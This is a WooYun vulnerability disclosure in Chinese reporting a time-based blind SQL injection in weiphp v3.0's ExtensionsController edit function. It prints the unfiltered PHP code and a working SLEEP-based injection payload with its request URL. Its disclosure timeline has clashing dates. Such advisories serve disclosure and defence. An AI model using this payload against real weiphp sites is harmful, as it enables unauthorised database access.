当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156116

漏洞标题:weiphp v3.0 sql盲注再来一处

相关厂商:weiphp.cn

漏洞作者: 不能忍

提交时间:2015-11-26 16:59

修复时间:2015-01-26 10:54

公开时间:2015-01-26 10:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2016-01-25: 细节向核心白帽子及相关领域专家公开
2016-02-04: 细节向普通白帽子公开
2016-02-14: 细节向实习白帽子公开
2015-01-26: 细节向公众公开

简要描述:

详细说明:

漏洞文件:Addons/Extensions/Controller/ExtensionsController.class.php

public function edit($model = null, $id = 0) {
is_array ( $model ) || $model = $this->getModel ( $model );
$id || $id = I ( 'id' );

if (IS_POST) {
$Model = D ( parse_name ( get_table_name ( $model ['id'] ), 1 ) );

// 清空旧关键词
$keyword = $Model->where ( 'id=' . $id )->getField ( 'keyword' );
$keyword = preg_split ( '/[\s,;]+/', $keyword ); // 以空格tab逗号分号分割关键词
$data ['addon'] = 'Extensions';
foreach ( $keyword as $key ) {
$data ['keyword'] = trim ( $key );
$res = M ( 'keyword' )->where ( $data )->delete ();
}

// 获取模型的字段信息
$Model = $this->checkAttr ( $Model, $model ['id'] );
if ($Model->create () && $Model->save ()) {

$this->_saveKeyword ( $model, $id );

$this->success ( '保存' . $model ['title'] . '成功!', U ( 'lists?model=' . $model ['name'] ) );
} else {
$this->error ( $Model->getError () );
}
} else {
parent::edit ( $model, $id );
}
}


也是没过滤就直接进库了。
payload:
http://localhost/index.php?s=/addon/Extensions/Extensions/edit/model/1168/mdm/45|340.html
post:
id=test) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--

漏洞证明:

blind1.jpg

修复方案:

版权声明:转载请注明来源 不能忍@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-26 10:54

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价